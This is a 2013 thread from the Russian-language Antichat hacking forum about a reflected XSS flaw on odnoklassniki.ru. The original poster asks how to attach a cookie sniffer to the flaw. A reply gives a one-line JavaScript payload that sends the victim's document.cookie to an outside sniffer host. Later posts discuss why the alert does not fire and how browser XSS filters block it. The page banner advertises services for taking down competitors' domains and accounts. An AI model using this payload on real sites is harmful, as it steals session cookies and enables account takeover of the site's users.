FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Уязвимости
>
Уязвимости Mail-сервис
Пассивная XSS odnoklassniki.ru
Поиск по форуму
Расширенный поиск
Опции темы
Поиск в этой теме
Опции просмотра
#
1
15.01.2013, 08:16
DavidRog
Новичок
Регистрация: 01.09.2011
Сообщений: 7
С нами:
7735286
Репутация:
10
Из соседней темы, взял эту пассивку.
Цитата:
Сообщение от
_Spamer_
Пассивная XSS odnoklassniki.ru
https://cards2.odnoklassniki.ru/index.html?ServiceDescr=XSS
Подставляя такое:
или
click me!
вылазит алерт.
Вопрос.. а как снифер сюда прикрутить ?
𝕏 Twitter
Reddit
Telegram
Копировать ссылку
DavidRog
Посмотреть профиль
Репутация
Найти все сообщения от DavidRog
Добавить в друзья
#
2
15.01.2013, 12:39
йож
Познающий
Регистрация: 31.08.2012
Сообщений: 50
С нами:
7209686
Репутация:
0
img = new Image(); img.src = "http://sniffer.ru/evil.gif?"+document.cookie;
йож
Посмотреть профиль
Репутация
Найти все сообщения от йож
Добавить в друзья
#
3
15.01.2013, 13:54
DavidRog
Новичок
Регистрация: 01.09.2011
Сообщений: 7
С нами:
7735286
Репутация:
10
Цитата:
Сообщение от
йож
img = new Image(); img.src = "http://sniffer.ru/evil.gif?"+document.cookie;
Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..
DavidRog
Посмотреть профиль
Репутация
Найти все сообщения от DavidRog
Добавить в друзья
#
4
15.01.2013, 13:59
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
Цитата:
Сообщение от
DavidRog
Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..
Ты про обход фильтров что нибудь слышал?
OxoTnik
Посмотреть профиль
Репутация
Найти все сообщения от OxoTnik
Добавить в друзья
#
5
15.01.2013, 13:59
justonline
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
Цитата:
Сообщение от
DavidRog
Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..
хром и ие фильтруют пассивки
justonline
Посмотреть профиль
Репутация
Найти все сообщения от justonline
Добавить в друзья
#
6
15.01.2013, 13:59
йож
Познающий
Регистрация: 31.08.2012
Сообщений: 50
С нами:
7209686
Репутация:
0
какой браузер?
йож
Посмотреть профиль
Репутация
Найти все сообщения от йож
Добавить в друзья
#
7
15.01.2013, 14:10
DavidRog
Новичок
Регистрация: 01.09.2011
Сообщений: 7
С нами:
7735286
Репутация:
10
Цитата:
Сообщение от
йож
какой браузер?
пробовал через FF и CHROME.
вот так alert(/xss/) в коде хтмл вроде все ровно, но алерт не вылазит.
пару лет назад все получалось, а щас нет.
подумал просто что есть какой-то вариант не в теги выполнять произвольный код. а например в
DavidRog
Посмотреть профиль
Репутация
Найти все сообщения от DavidRog
Добавить в друзья
«
Предыдущая тема
|
Следующая тема
»
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ЛИЧНЫЕ ФОРУМЫ
Арбитраж трафика
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.